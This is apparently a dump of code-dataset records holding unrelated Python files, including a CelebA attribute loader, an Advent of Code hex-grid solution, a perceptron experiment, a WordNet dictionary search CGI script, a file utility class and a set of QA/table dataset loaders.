\n","repo_name":"yassine-turki/Polytechnique_Courses","sub_path":"CSE202/Tutorial_2/mult.py","file_name":"mult.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"32676870842","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom scipy.misc import imresize\n\nimport torch\nimport torchvision.datasets as dset\nfrom torch.utils.data.dataset import Dataset\n\nVALID_PARTITIONS = {'train': 0, 'val': 1, 'test': 2}\nATTR_TO_IX_DICT = {'Sideburns': 30, 'Black_Hair': 8, 'Wavy_Hair': 33, 'Young': 39, 'Heavy_Makeup': 18, \n                   'Blond_Hair': 9, 'Attractive': 2, '5_o_Clock_Shadow': 0, 'Wearing_Necktie': 38, \n                   'Blurry': 10, 'Double_Chin': 14, 'Brown_Hair': 11, 'Mouth_Slightly_Open': 21, \n                   'Goatee': 16, 'Bald': 4, 'Pointy_Nose': 27, 'Gray_Hair': 17, 'Pale_Skin': 26, \n                   'Arched_Eyebrows': 1, 'Wearing_Hat': 35, 'Receding_Hairline': 28, 'Straight_Hair': 32, \n                   'Big_Nose': 7, 'Rosy_Cheeks': 29, 'Oval_Face': 25, 'Bangs': 5, 'Male': 20, 'Mustache': 22, \n                   'High_Cheekbones': 19, 'No_Beard': 24, 'Eyeglasses': 15, 'Bags_Under_Eyes': 3, \n                   'Wearing_Necklace': 37, 'Wearing_Lipstick': 36, 'Big_Lips': 6, 'Narrow_Eyes': 23, \n                   'Chubby': 13, 'Smiling': 31, 'Bushy_Eyebrows': 12, 'Wearing_Earrings': 34}\nATTR_IX_TO_KEEP = [4, 5, 8, 9, 11, 12, 15, 17, 18, 20, 21, 22, 26, 28, 31, 32, 33, 35]\nIX_TO_ATTR_DICT = {v:k for k,v in ATTR_TO_IX_DICT.items()}  # was Python-2 iteritems()\nN_ATTRS = len(ATTR_IX_TO_KEEP)\n\n\nclass CelebAttributes(Dataset):\n    \"\"\"Load images of celebrities and attributes.\"\"\"\n    def __init__(self, partition='train', image_transform=None, attr_transform=None):\n        self.partition = partition\n        self.image_transform = image_transform\n        self.attr_transform = attr_transform\n\n        assert partition in VALID_PARTITIONS.keys()\n        self.image_paths = load_eval_partition(partition)\n        self.attr_data = load_attributes(self.image_paths, partition)\n        self.size = int(len(self.image_paths))\n\n    def __getitem__(self, index):\n        \"\"\"\n        Args:\n            index (int): Index\n        Returns:\n            tuple: (image, target) where target is index of the target class.\n        \"\"\"\n        image_path = os.path.join('./data/img_align_celeba/', self.image_paths[index])\n        attr = self.attr_data[index]\n\n        # open PIL Image\n        image = Image.open(image_path)\n        image = image.convert('RGB')\n\n        if self.image_transform is not None:\n            image = self.image_transform(image)\n\n        if self.attr_transform is not None:\n            attr = self.attr_transform(attr)\n\n        return image, attr\n\n    def __len__(self):\n        return self.size\n\n\ndef load_eval_partition(partition):\n    eval_data = []\n    with open('./data/Eval/list_eval_partition.txt') as fp:\n        rows = fp.readlines()\n        for row in rows:\n            path, label = row.strip().split(' ')\n            label = int(label)\n            if label == VALID_PARTITIONS[partition]:\n                eval_data.append(path)\n    return eval_data\n\n\ndef load_attributes(paths, partition):\n    if os.path.isfile('./data/Anno/attr_%s.npy' % partition):\n        attr_data = np.load('./data/Anno/attr_%s.npy' % partition)\n    else:\n        attr_data = []\n        with open('./data/Anno/list_attr_celeba.txt') as fp:\n            rows = fp.readlines()\n            for ix, row in enumerate(rows[2:]):\n                row = row.strip().split()\n                path, attrs = row[0], row[1:]\n                if path in paths:\n                    attrs = np.array(attrs).astype(int)\n                    attrs[attrs < 0] = 0\n                    attr_data.append(attrs)\n        attr_data = np.vstack(attr_data).astype(np.int64)\n    attr_data = torch.from_numpy(attr_data).float()\n    return attr_data[:, ATTR_IX_TO_KEEP]\n\n\ndef tensor_to_attributes(tensor):\n    \"\"\"\n    @param tensor: PyTorch Tensor\n                   D dimensional tensor\n    @return attributes: list of strings\n    \"\"\"\n    attrs = []\n    n = tensor.size(0)\n    tensor = torch.round(tensor)\n    for i in range(n):  # was Python-2 xrange()\n        if tensor[i] > 0.5:\n            attr = IX_TO_ATTR_DICT[ATTR_IX_TO_KEEP[i]]\n            attrs.append(attr)\n    return attrs\n\n","repo_name":"wenxuanliu/multimodal-vae","sub_path":"celeba/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"}
+{"seq_id":"329677337","text":"file = open(\"11.txt\")\ndirs = file.readline().split(\",\")\n#dirs = \"se,sw,se,sw,sw\".split(\",\")\n# x is SE\n# y is S\n# z is (1,-1) is NE\n\ncurr = [0, 0]\nfurthest = 0\nfor i in dirs:\n    if i == \"se\":\n        dir = [1, 0]\n    elif i == \"nw\":\n        dir = [-1, 0]\n    elif i == \"s\":\n        dir = [0, 1]\n    elif i == \"n\":\n        dir = [0, -1]\n    elif i == \"ne\":\n        dir = [1, -1]\n    elif i == \"sw\":\n        dir = [-1, 1]\n    curr[0] += dir[0]\n    curr[1] += dir[1]\n    distance = max(abs(curr[0]), abs(curr[1]), abs(curr[0] + curr[1]))\n    furthest = max(furthest, distance)\n\nprint(curr)\nprint(furthest)\n
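\n# --- added check (editor's illustration; hex_distance is a hypothetical helper, not part of the\n# original solution). It repackages the loop above so the distance formula can be exercised on the\n# commented sample path, whose expected answer for this puzzle is 3. ---\ndef hex_distance(moves):\n    pos = [0, 0]\n    steps = {'se': (1, 0), 'nw': (-1, 0), 's': (0, 1), 'n': (0, -1), 'ne': (1, -1), 'sw': (-1, 1)}\n    for m in moves:\n        pos[0] += steps[m][0]\n        pos[1] += steps[m][1]\n    return max(abs(pos[0]), abs(pos[1]), abs(pos[0] + pos[1]))\n\nassert hex_distance('se,sw,se,sw,sw'.split(',')) == 3\n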
","repo_name":"terencesll/AdventOfCode","sub_path":"2017/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"19464720711","text":"import random\n\n\n# ret = vector1.vector2\ndef inner_product(vector1, vector2):\n    return sum(vector1[i]*vector2[i] for i in range(0, len(vector1)))\n\n# ret = value*vector1 + vector2\ndef dot_product_add(value, vector1, vector2):\n    return [vector1[i]*value + vector2[i] for i in range(0, len(vector1))]\n\n\ndef cross_product(Ax, Ay, Bx, By, Cx, Cy):\n    return (Bx - Ax) * (Cy - Ay) - (By - Ay) * (Cx - Ax)\n\n\ndef perceptron_train(training_set, label, learning_rate = 1.0):\n    num = len(training_set)\n    if num == 0:\n        raise ValueError(\"the training set is empty\")  # was an invalid string raise\n    if len(label) != num:\n        raise ValueError(\"the number of training samples does not match the number of labels\")\n    for sample in training_set:\n        sample.append(1)  # NB: appends a bias term in place, mutating the caller's lists\n    dim = len(training_set[0])\n    model = [0] * dim\n    x = 0\n    while True:\n        error_count = 0\n        for i in range(0, num):\n            # print 'ITERATION - {0}'.format(x)\n            if label[i]*inner_product(model, training_set[i]) <= 0:\n                x += 1\n                model = dot_product_add(label[i]*learning_rate, training_set[i], model)\n                error_count = error_count + 1\n        if error_count == 0:\n            return model, x\n\n\ndef perceptron_predict(test_set, model, threshold = 0):\n    prediction = []\n    for sample in test_set:\n        sample.append(1)\n        if inner_product(sample, model) > threshold:\n            prediction.append(1)\n        else:\n            prediction.append(-1)\n    return prediction\n\n\n\ndef generate_training_points(N):\n    # training_set = [[.3,.3], [.4,.3], [.1,.1], [.2,.1]]\n    # label = [1, 1, -1, -1]\n    # y = mx + b\n    # create a line\n    xy1 = (random.uniform(-1, 1), random.uniform(-1, 1))\n    xy2 = (random.uniform(-1, 1), random.uniform(-1, 1))\n    # y - y1 = m(x - x1)\n    x1, y1 = xy1\n    x2, y2 = xy2\n    m = (y1 - y2) / (x1 - x2)\n    # y - y1 = m * (x - x1)\n    # y = mx - mx1 + y1\n    b = -(m*x1) + y1\n    # gather training data\n    processing = True\n    while processing:\n        training_set = []\n        label = []\n        for x in range(N):\n            xy3 = (random.uniform(-1, 1), random.uniform(-1, 1))\n            x3, y3 = xy3\n            training_set.append([x3,y3])\n            cp = cross_product(x1, y1, x2, y2, x3, y3)\n            if cp < 0:\n                label.append(-1)\n            elif cp > 0:\n                label.append(1)\n        if len(label) == N:\n            processing = False\n    return (xy1,xy2), training_set, label\n\n\ndef generate_test_points(f, M):\n    # test_set = [[.5,.5], [.1,.1]]\n    xy1, xy2 = f\n    x1, y1 = xy1\n    x2, y2 = xy2\n    processing = True\n    while processing:\n        test_set = []\n        label = []\n        for x in range(M):\n            xy3 = (random.uniform(-1, 1), random.uniform(-1, 1))\n            x3, y3 = xy3\n            test_set.append([x3,y3])\n            cp = cross_product(x1, y1, x2, y2, x3, y3)\n            if cp < 0:\n                label.append(-1)\n            elif cp > 0:\n                label.append(1)\n        if len(label) == M:\n            processing = False\n    return test_set, label\n\n\nites = []\nerrors = []\nfor trial in range(0, 1000):\n    f, training_set, label = generate_training_points(100)\n    model, iterations = perceptron_train(training_set, label)\n    ites.append(iterations)\n    test_set, test_label = generate_test_points(f, 1000)\n    prediction = perceptron_predict(test_set, model)\n    error = 0\n    for t, p in zip(test_label, prediction):\n        if t != p:\n            error += 1\n    errors.append(float(error)/float(1000))\n\n\n# the averages were previously computed and silently discarded; print them instead\nprint(sum(ites)/len(ites))\nprint(sum(errors)/len(errors))\n
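\n# --- added mini-demo (editor's illustration; tiny made-up 1-D data, deterministic).\n# perceptron_train appends a bias in place, so fresh literals are passed. ---\n_demo_model, _demo_updates = perceptron_train([[2.0], [-2.0]], [1, -1])\nassert perceptron_predict([[3.0]], _demo_model) == [1]\nassert perceptron_predict([[-3.0]], _demo_model) == [-1]\n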
\n","repo_name":"figgybit/alogrithms","sub_path":"perceptron/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"18946161276","text":"import cgi\nimport html\nimport os\nimport sys\nimport textwrap\nimport tkrzw_dict\nimport tkrzw_wordnet_searcher\nimport urllib.parse\n\n\nPAGE_WIDTH = 100\nCGI_DATA_PREFIX = \"wordnet\"\n\n\ndef PrintWrappedText(text, indent, multi_byte):\n  page_width = PAGE_WIDTH\n  if multi_byte:\n    page_width = int(page_width * 0.6)\n  for line in textwrap.wrap(text, page_width - indent):\n    print((\" \" * indent) + line)\n\n\ndef PrintResultWord(key, entry, show_details):\n  print(\"---- {} ----\".format(key))\n  if show_details:\n    score = entry.get(\"score\")\n    if score:\n      print(\"score: {:.6f}\".format(float(score)))\n    search_score = entry.get(\"search_score\")\n    if search_score:\n      print(\"search_score: {:.6f}\".format(float(search_score)))\n  for item in entry[\"item\"]:\n    print()\n    title = item.get(\"word\") or key\n    pos = item.get(\"pos\")\n    if pos:\n      title += \" [{}]\".format(pos)\n    print(\"  {}\".format(title))\n    translations = item.get(\"translation\")\n    if translations:\n      translations = tkrzw_dict.DeduplicateWords(translations)\n      if not show_details:\n        translations = translations[:5]\n      PrintWrappedText(\", \".join(translations), 4, True)\n    gloss = item.get(\"gloss\")\n    if gloss:\n      PrintWrappedText(gloss, 4, False)\n    if show_details:\n      attrs = (\"synonym\", \"hypernym\", \"hyponym\", \"antonym\", \"similar\", \"derivative\")\n      for attr in attrs:\n        values = item.get(attr)\n        if values:\n          PrintWrappedText(\"{}: {}\".format(attr, \", \".join(values)), 6, False)\n      score = item.get(\"score\")\n      if score:\n        PrintWrappedText(\"score: {:.6f}\".format(float(score)), 6, False)\n    else:\n      synonyms = item.get(\"synonym\")\n      if synonyms:\n        PrintWrappedText(\"syn: {}\".format(\", \".join(synonyms)), 6, False)\n  print()\n\n\ndef main():\n  args = sys.argv[1:]\n  data_prefix = tkrzw_dict.GetCommandFlag(args, \"--data_prefix\", 1) or \"wordnet\"\n  direction = tkrzw_dict.GetCommandFlag(args, \"--direction\", 1) or \"auto\"\n  show_details = tkrzw_dict.GetCommandFlag(args, \"--details\", 0)\n  text = \" \".join(args)\n  if not text:\n    raise RuntimeError(\"words are not specified\")\n  reverse = False\n  if direction == \"auto\":\n    reverse = tkrzw_dict.PredictLanguage(text) != \"en\"\n  elif direction == \"reverse\":\n    reverse = True\n  searcher = tkrzw_wordnet_searcher.WordNetSearcher(data_prefix)\n  if reverse:\n    result = searcher.SearchReverse(text)\n  else:\n    result = searcher.SearchExact(text)\n  if result:\n    for key, entry in result:\n      PrintResultWord(key, entry, show_details)\n  else:\n    print(\"No result.\")\n\n\ndef esc(expr):\n  if expr is None:\n    return \"\"\n  return html.escape(str(expr), True)\n\n\ndef PrintResultWordCGI(key, entry, show_details):\n  # NB: the HTML tags inside the print calls of this function and of main_cgi below were\n  # stripped when this file was extracted; the markup used here is a generic reconstruction,\n  # not the original tags.\n  print('<div class=\"entry\">')\n  print('<h2 class=\"entry_word\">{}</h2>'.format(esc(key)))\n  for item in entry[\"item\"]:\n    print('<div class=\"item\">')\n    word = item.get(\"word\") or key\n    print('<div class=\"item_word\">', end='')\n    print('<a href=\"?q={}\">{}</a>'.format(\n      esc(urllib.parse.quote(word)), esc(word)))\n    pos = item.get(\"pos\")\n    if pos:\n      print('<span class=\"item_pos\">[{}]</span>'.format(esc(pos)), end='')\n    print('</div>')\n    translations = item.get(\"translation\")\n    if translations:\n      translations = tkrzw_dict.DeduplicateWords(translations)\n      translations = translations[:5]\n      print('<div class=\"item_translation\">', end='')\n      esc_trans = []\n      for tran in translations:\n        esc_trans.append('<a href=\"?q={}\">{}</a>'.format(\n          esc(urllib.parse.quote(tran)), esc(tran)))\n      print(', '.join(esc_trans), end='')\n      print('</div>')\n    gloss = item.get(\"gloss\")\n    if gloss:\n      print('<div class=\"item_gloss\">{}</div>'.format(esc(gloss)))\n    if show_details:\n      attrs = (\"synonym\", \"hypernym\", \"hyponym\", \"antonym\", \"similar\", \"derivative\")\n    else:\n      attrs = ('synonym',)\n    for attr in attrs:\n      values = item.get(attr)\n      if values:\n        print('<div class=\"item_rel\">', end='')\n        print('{}: '.format(esc(attr)), end='')\n        esc_relwords = []\n        for value in values:\n          esc_relwords.append('<a href=\"?q={}\">{}</a>'.format(\n            esc(urllib.parse.quote(value)), esc(value)))\n        print(', '.join(esc_relwords), end='')\n        print('</div>')\n    print('</div>')\n  print('</div>')\n\n\ndef main_cgi():\n  script_name = os.environ.get(\"SCRIPT_NAME\", sys.argv[0])\n  params = {}\n  form = cgi.FieldStorage()\n  for key in form.keys():\n    value = form[key]\n    params[key] = value.value\n  query = params.get(\"q\") or \"\"\n  # NB: reconstructed page template; the original markup was lost during extraction.\n  print(\"\"\"Content-Type: application/xhtml+xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<title>WordNet Search</title>\n</head>\n<body>\n<article>\n<h1>WordNet Search</h1>\n<form method=\"get\" action=\"{}\">\nQuery: <input type=\"text\" name=\"q\" value=\"{}\"/>\n<input type=\"submit\" value=\"search\"/>\n</form>\n\"\"\".format(esc(script_name), esc(query)))\n  if query:\n    reverse = tkrzw_dict.PredictLanguage(query) != \"en\"\n    searcher = tkrzw_wordnet_searcher.WordNetSearcher(CGI_DATA_PREFIX)\n    if reverse:\n      result = searcher.SearchReverse(query)\n    else:\n      result = searcher.SearchExact(query)\n    if result:\n      show_details = not reverse\n      for key, entry in result:\n        PrintResultWordCGI(key, entry, show_details)\n    else:\n      print('<div class=\"message\">No result.</div>')\n  else:\n    print(\"\"\"<div class=\"message\">\n<p>This site demonstrates a search system on an English-Japanese dictionary. If you input an English word, entries whose titles match it are shown. If you input a Japanese word, entries whose translations match it are shown.</p>\n<p>This service uses data from WordNet and Japanese WordNet.</p>\n</div>\"\"\")\n  print(\"\"\"</article>\n</body>\n</html>
\n\n\"\"\")\n\n\nif __name__==\"__main__\":\n interface = os.environ.get(\"GATEWAY_INTERFACE\")\n if interface and interface.startswith(\"CGI/\"):\n main_cgi()\n else:\n main()\n","repo_name":"estraier/tkrzw-dict","sub_path":"search_wordnet.py","file_name":"search_wordnet.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"67"} +{"seq_id":"30418212270","text":"import os\nimport json\nfrom collections import OrderedDict\n\n\ndef sort_meta_dict(input_dict: dict) -> OrderedDict:\n \"\"\"\n Sorting Meta dictionary in result directory.\n @param input_dict:\n @return:\n \"\"\"\n sorted_tuple = sorted(input_dict.items(), key=lambda item: int(item[0]))\n return OrderedDict(sorted_tuple)\n\n\nclass FileUtil:\n max_storage = 0\n actual_storage = 0\n\n def __init__(self, max_storage=1000):\n self.max_storage = max_storage\n\n @staticmethod\n def mkdir_if_not_exists(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n\n @staticmethod\n def save_to_txt_file(file_name: str, txt_iter: iter, output_dir=\"results\"):\n txt_dir = os.path.join(os.getcwd(), output_dir)\n FileUtil.mkdir_if_not_exists(txt_dir)\n file_path = os.path.join(txt_dir, file_name)\n file_object = open(file_path, 'a')\n for line in txt_iter:\n file_object.write(line)\n file_object.write(\"\\n\")\n file_object.close()\n\n @staticmethod\n def save_meta_dict(data, output_dir=\"results\"):\n meta_path = os.path.join(os.getcwd(), output_dir, 'meta.json')\n with open(meta_path, 'w') as fp:\n json.dump(sort_meta_dict(data), fp, ensure_ascii=False)\n\n @staticmethod\n def load_meta_dict(output_dir: str = \"results\") -> dict:\n \"\"\"\n @param output_dir: Output directory which contains meta\n @return: ordered dictionary by key\n \"\"\"\n meta_path = os.path.join(os.getcwd(), output_dir, 'meta.json')\n if os.path.exists(meta_path):\n with open(meta_path, 'r') as fp:\n return sort_meta_dict(json.load(fp))\n else:\n return OrderedDict()\n\n def add_storage(self, file_path):\n # Convert bytes to mega bytes\n file_size = os.path.getsize(file_path) / 1e+6\n print(\"file size:\", file_size)\n self.actual_storage += file_size\n\n def check_storage(self):\n print(\"actual storage\", self.actual_storage)\n return self.actual_storage < self.max_storage\n\n @staticmethod\n def delete_file(file_path: str):\n if os.path.exists(file_path):\n print(\"{} deleted.\".format(file_path))\n os.remove(file_path)\n","repo_name":"zawlinnnaing/my-wiki-crawler","sub_path":"utils/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14032523879","text":"from name import *\nfrom utils import *\nimport os\nimport time\n\ndef load_spider_data():\n spider_train_path = os.path.join(Spiderpath, Spidertrain)\n spider_others_path = os.path.join(Spiderpath, Spiderothers)\n spider_dev_path = os.path.join(Spiderpath, Spiderdev)\n spider_table_path = os.path.join(Spiderpath, Spidertable)\n\n spider_train_data = read_json(spider_train_path)\n spider_others_data = read_json(spider_others_path)\n spider_dev_data = read_json(spider_dev_path)\n spider_table_data = read_json(spider_table_path)\n\n total_data = []\n total_data += spider_train_data\n total_data += spider_dev_data\n\n questions, dbschema = preprocess_data(total_data, spider_table_data, Spider)\n otherquestions, dbschema = preprocess_data(spider_others_data, spider_table_data, Spiderother)\n\n return questions, 
dbschema, otherquestions\n\ndef load_hybridQA_data():\n hybridQA_train_path = os.path.join(HybridQApath, HybridQAtrain)\n hybridQA_test_path = os.path.join(HybridQApath, HybridQAtest)\n hybridQA_dev_path = os.path.join(HybridQApath, HybridQAdev)\n\n hybridQA_train_data = read_json(hybridQA_train_path)\n hybridQA_test_data = read_json(hybridQA_test_path)\n hybridQA_dev_data = read_json(hybridQA_dev_path)\n hybridQA_table_data = get_hybridQA_table_data()\n\n total_data = []\n total_data += hybridQA_train_data\n total_data += hybridQA_test_data\n total_data += hybridQA_dev_data\n\n questions, dbschema = preprocess_data(total_data, hybridQA_table_data, HybridQA)\n\n return questions, dbschema\n\ndef load_wikiSQL_data():\n wikiSQL_train_path = os.path.join(WikiSQLpath, WikiSQLtrain)\n wikiSQL_test_path = os.path.join(WikiSQLpath, WikiSQLtest)\n wikiSQL_dev_path = os.path.join(WikiSQLpath, WikiSQLdev)\n wikiSQL_train_table_path = os.path.join(WikiSQLpath, WikiSQLtraintable)\n wikiSQL_test_table_path = os.path.join(WikiSQLpath, WikiSQLtesttable)\n wikiSQL_dev_table_path = os.path.join(WikiSQLpath, WikiSQLdevtable)\n\n wikiSQL_train_data = read_jsonl(wikiSQL_train_path)\n wikiSQL_test_data = read_jsonl(wikiSQL_test_path)\n wikiSQL_dev_data = read_jsonl(wikiSQL_dev_path)\n wikiSQL_train_table_data = read_jsonl(wikiSQL_train_table_path)\n wikiSQL_test_table_data = read_jsonl(wikiSQL_test_table_path)\n wikiSQL_dev_table_data = read_jsonl(wikiSQL_dev_table_path)\n\n total_data = []\n total_data += wikiSQL_train_data\n total_data += wikiSQL_test_data\n total_data += wikiSQL_dev_data\n\n total_table = []\n total_table += wikiSQL_train_table_data\n total_table += wikiSQL_test_table_data\n total_table += wikiSQL_dev_table_data\n\n questions, dbschema = preprocess_data(total_data, total_table, WikiSQL)\n\n return questions, dbschema\n\ndef load_wikitable_data():\n wikitable_train_path = os.path.join(Wikitablepath, Wikitabletrain)\n\n wikitable_train_data = get_wikitable_question(wikitable_train_path)\n wikitable_table_data = get_wikitable_table_data()\n\n questions, dbschema = preprocess_data(wikitable_train_data, wikitable_table_data, Wikitable)\n\n return questions, dbschema\n\ndef load_kvret_data():\n kvret_train_path = os.path.join(Kvretpath, Kvrettrain)\n kvret_dev_path = os.path.join(Kvretpath, Kvretdev)\n\n kvret_train_data = read_json(kvret_train_path)\n kvret_dev_data = read_json(kvret_dev_path)\n\n total_data = []\n total_data += kvret_train_data\n total_data += kvret_dev_data\n\n questions, dbschema = preprocess_data(total_data, [], Kvret)\n\n return questions, dbschema\n\ndef load_tablefact_data():\n tablefact_train1_path = os.path.join(Tablefactquestionpath, Tablefacttrain1)\n tablefact_train2_path = os.path.join(Tablefactquestionpath, Tablefacttrain2)\n\n tablefact_train1_data = read_json(tablefact_train1_path)\n tablefact_train2_data = read_json(tablefact_train2_path)\n tablefact_table_data = get_tablefact_table_data()\n\n total_data = {}\n total_data.update(tablefact_train1_data)\n total_data.update(tablefact_train2_data)\n\n questions, dbschema = preprocess_data(total_data, tablefact_table_data, Tablefact)\n\n return questions, dbschema\n\ndef load_msmarco_data():\n #msmarcousefulnesspath = os.path.join(Msmarcopath, Msmarcousefulness)\n msmarcomsmarcopath = os.path.join(Msmarcopath, Msmarcomsmarco)\n #questions = get_msmarco_usefulness(msmarcousefulnesspath)\n questions = read_json(msmarcomsmarcopath)\n\n questions, dbschema = preprocess_data(questions, [], Msmarco)\n\n return questions, 
dbschema\n\ndef load_wikiQA_data():\n wikiqapath = os.path.join(WikiQApath, WikiQAtsv)\n\n questions = get_wikiQAtsv(wikiqapath)\n\n questions, dbschema = preprocess_data(questions, [], WikiQA)\n\n return questions, dbschema\n\ndef load_coqa_data():\n coqapath = os.path.join(Coqapath, Coqatrain)\n\n content = read_json(coqapath)\n\n questions, dbschema = preprocess_data(content, [], Coqa)\n\n return questions, dbschema\n\ndef load_quac_data():\n quacpath = os.path.join(Quacpath, Quactrain)\n\n content = read_json(quacpath)\n\n questions, dbschema = preprocess_data(content, [], Quac)\n\n return questions, dbschema\n\ndef load_dbdomain_data():\n dbdomainsqlitepath = os.path.join(Dbdomainpath, Dbdomainsqlite)\n dbdomainrevisedpath = os.path.join(Dbdomainpath, Dbdomainrevised)\n\n db2tables = get_domainsqlite(dbdomainsqlitepath, dbdomainrevisedpath)\n db2questionsambiguous, db2questionsnotambiguous = get_domainrevised(dbdomainrevisedpath)\n\n ambiguousquestions, dbschema = preprocess_data(db2questionsambiguous, db2tables, Dbdomainambiguous)\n notambiguousquestions, dbschema = preprocess_data(db2questionsnotambiguous, db2tables, Dbdomainnotambiguous)\n\n return ambiguousquestions, notambiguousquestions, dbschema\n\ndef load_alex_data():\n alexpath = os.path.join(Alexpath, Alexdataset)\n\n alexquestions = read_json(alexpath)\n\n questions, dbschema = preprocess_data(alexquestions, [], Alex)\n\n return questions, dbschema\n\ndef load_googlenq_data():\n \"\"\"googlenqpath = os.path.join(Googlenqpath, Googlenqdev)\n\n googlenqquestions = read_jsonl(googlenqpath)\"\"\"\n googlenqpath = os.path.join(Googlenqpath, Googlenqdata)\n\n googlenqquestions = read_json(googlenqpath)\n\n questions, dbschema = preprocess_data(googlenqquestions, [], Googlenq)\n\n return questions, dbschema\n\ndef load_totto_data():\n tottotrainpath = os.path.join(Tottopath, Tottotrain)\n tottodevpath = os.path.join(Tottopath, Tottodev)\n\n #tottotrainquestions = read_jsonl(tottotrainpath)\n tottodevquestions = read_jsonl(tottodevpath)\n\n total_data = []\n #total_data += tottotrainquestions\n total_data += tottodevquestions\n\n questions, dbschema = preprocess_data(total_data, [], Totto)\n\n return questions, dbschema\n\ndef load_logicnlg_data():\n logicnlgtrainpath = os.path.join(Logicnlgpath, Logicnlgtrain)\n #logicnlgtestpath = os.path.join(Logicnlgpath, Logicnlgtest)\n #logicnlgvalpath = os.path.join(Logicnlgpath, Logicnlgval)\n\n logicnlgtrainquestions = read_json(logicnlgtrainpath)\n\n questions, dbschema = preprocess_data(logicnlgtrainquestions, [], Logicnlg)\n\n return questions, dbschema\n\ndef load_sparc_data():\n sparctrainpath = os.path.join(Sparcpath, Sparctrain)\n sparcdevpath = os.path.join(Sparcpath, Sparcdev)\n sparctablespath = os.path.join(Sparcpath, Sparctables)\n\n sparctraindata = read_json(sparctrainpath)\n sparcdevdata = read_json(sparcdevpath)\n sparctables = read_json(sparctablespath)\n\n total_data = []\n total_data += sparctraindata\n total_data += sparcdevdata\n\n questions, dbschema = preprocess_data(total_data, sparctables, Sparc)\n\n return questions, dbschema\n\ndef load_cosql_data():\n cosqldatapath = os.path.join(Cosqlpath, Cosqldialogs)\n cosqltrainpath = os.path.join(Cosqluserintentpath, Cosqltrain)\n cosqldevpath = os.path.join(Cosqluserintentpath, Cosqldev)\n cosqltablepath = os.path.join(Cosqlpath, Cosqltables)\n\n cosqldata = read_json(cosqldatapath)\n cosqltraindata = read_json(cosqltrainpath)\n cosqldevdata = read_json(cosqldevpath)\n cosqltables = read_json(cosqltablepath)\n\n 
total_data = []\n total_data += cosqltraindata\n total_data += cosqldevdata\n\n questions, dbschema = preprocess_data(total_data, cosqltables, Cosql)\n questionsnotambiguous, dbschema = preprocess_data(cosqldata, cosqltables, Cosqlnotambiguous)\n\n return questions, dbschema, questionsnotambiguous\n\ndef load_alexa_data():\n alexatrainpath = os.path.join(Alexapath, Alexatrain)\n alexavalidfreqpath = os.path.join(Alexapath, Alexavalidfreq)\n alexavalidrarepath = os.path.join(Alexapath, Alexavalidrare)\n alexatestfreqpath = os.path.join(Alexapath, Alexatestfreq)\n alexatestrarepath = os.path.join(Alexapath, Alexatestrare)\n\n alexatraindata = read_json(alexatrainpath)\n alexavalidfreq = read_json(alexavalidfreqpath)\n alexavalidrare = read_json(alexavalidrarepath)\n alexatestfreq = read_json(alexatestfreqpath)\n alexatestrare = read_json(alexatestrarepath)\n\n total_data = {}\n total_data.update(alexatraindata)\n total_data.update(alexavalidfreq)\n total_data.update(alexavalidrare)\n total_data.update(alexatestfreq)\n total_data.update(alexatestrare)\n\n questions, dbschema = preprocess_data(total_data, [], Alexa)\n\n return questions, dbschema\n\nif __name__ == \"__main__\":\n start = time.time()\n\n spiderquestions, spiderdbschema, spiderotherquestions = load_spider_data()\n hybridQAquestions, hybridQAschema = load_hybridQA_data()\n wikiSQLquestions, wikiSQLschema = load_wikiSQL_data()\n wikitablequestions, wikitableschema = load_wikitable_data()\n #kvretquestions, kvretschema, kvretquestions2dataset = load_kvret_data()\n tablefactquestions, tablefactschema = load_tablefact_data()\n msmarcoquestions, msmarcoschema = load_msmarco_data()\n wikiqaquestions, wikiqaschema = load_wikiQA_data()\n coqaquestions, coqaschema = load_coqa_data()\n quacquestions, quacschema = load_quac_data()\n dbdomainambiguousquestions, dbdomainnotambiguousquestions, dbdomainschema = load_dbdomain_data()\n #alexquestions, alexschema = load_alex_data()\n googlenqquestions, googlenqschema = load_googlenq_data()\n tottoquestions, tottoschema = load_totto_data()\n logicnlgquestions, logicnlgschema = load_logicnlg_data()\n sparcquestions, sparcschema = load_sparc_data()\n cosqlquestions, cosqlschema, cosqlnotambiguousquestions = load_cosql_data()\n alexaquestions, alexaschema = load_alexa_data()\n\n total_schema = {Spider: spiderdbschema,\n Spiderother: spiderdbschema,\n HybridQA: hybridQAschema,\n WikiSQL: wikiSQLschema,\n Wikitable: wikitableschema,\n Tablefact: tablefactschema,\n Dbdomainambiguous: dbdomainschema,\n Dbdomainnotambiguous: dbdomainschema,\n Totto: tottoschema,\n Logicnlg: wikiSQLschema,\n Sparc: sparcschema,\n Cosql: cosqlschema,\n Cosqlnotambiguous: cosqlschema}\n\n train_schema, dev_schema, test_schema = splitdataschema(total_schema)\n\n \"\"\"out = WikiSQL\n\n newschema = {}\n for key in train_schema[out]:\n newschema[key] = train_schema[out][key]['table']\n mkdir(out)\n write_json(\n newschema, out + \"/train.json\"\n )\n newschema = {}\n for key in test_schema[out]:\n newschema[key] = test_schema[out][key]['table']\n mkdir(out)\n write_json(\n newschema, out + \"/test.json\"\n )\n\n newschema = {}\n for key in dev_schema[out]:\n newschema[key] = dev_schema[out][key]['table']\n mkdir(out)\n write_json(\n newschema, out + \"/dev.json\"\n )\"\"\"\n\n total_questions = {Spider: spiderquestions,\n Spiderother: spiderotherquestions,\n WikiSQL: 